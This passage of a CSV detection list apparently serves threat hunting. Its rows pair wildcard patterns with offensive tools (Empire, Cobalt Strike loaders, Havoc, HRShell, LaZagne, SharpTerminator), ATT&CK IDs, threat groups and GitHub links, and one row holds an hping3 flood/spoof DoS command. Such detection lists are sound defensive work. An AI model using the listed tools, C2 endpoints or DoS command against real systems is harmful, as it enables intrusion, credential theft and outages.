Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*hookedbrowsers.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*hook-infection_monkey.exploit.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-infection_monkey.network.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-infection_monkey.post_breach.actions.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-infection_monkey.post_breach.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-infection_monkey.ransomware.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-infection_monkey.system_info.collectors.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,hook script for lsassy from 
crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*hook-pypsrp.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*HOST/EXEGOL-01.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Host: FUZZ.machine.org*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive 
tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*HostEnum.ps1*,offensive_tool_keyword,red-team-scripts,script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch,T1016 - T1087.001 - T1049 - T1069,TA0007 - TA0003 - TA0006,N/A,N/A,Discovery,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z
-*HostExploiter.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*HostingCLR_inject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*HostingCLRx64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*houqingv1.0.zip*,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*hpe_sim_76_amf_deserialization*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*hping2.h*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z
-*hping3 -*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z
-*hping3 * --flood --frag --spoof * --destport*,offensive_tool_keyword,hping3,HPING3 DoS,T1498 - T1095 - T1045,TA0040 - TA0001 - TA0043,N/A,N/A,DOS,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*HRShell*client.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*HRShell*server.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*hta_evasion.hta*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*HtaPowershellGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*hta-to-javascript-crypter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*HtaVBSGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*htdigest2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*html/js/beacons.js*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*html/scripts/merlin.js*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Html-Injection-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z 
-*Html-Injection-Read-File-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*HTMLSmuggler-main*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*HTool*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A -*HTool/WCE*,signature_keyword,Antivirus Signature,Generic hacktool Engine signature,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HTool-Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*htrgouvea/nipe*,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,1,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*htshells-master*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http* | hakrawler -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*http*.sslip.io*,greyware_tool_keyword,sslip.io,sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 
127-0-0-1.sslip.io maps to 127.0.0.1,T1568.002 - T1048.003,TA0003 - TA0004,N/A,N/A,C2,https://github.com/cunnie/sslip.io,1,1,letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic,6,10,463,63,2023-10-02T11:53:54Z,2015-08-26T18:43:35Z -*http*//127.0.0.1:5001*,greyware_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*http*//localhost:5001*,greyware_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*http*/127.0.0.1*:1337*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http*/charlotte.dll*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*http*/demon.dll,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*http*/demon.exe,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*http*/demos/butcher/index.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http*/john/Test/raw/master/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*http*/localhost*:1337*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http*/zha0gongz1*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*http*://*/Terminator.sys,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*http*://127.0.0.1:4433*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://127.0.0.1:5556*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://127.0.0.1:8081*,greyware_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:4433*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:5556*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:8081*,greyware_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful 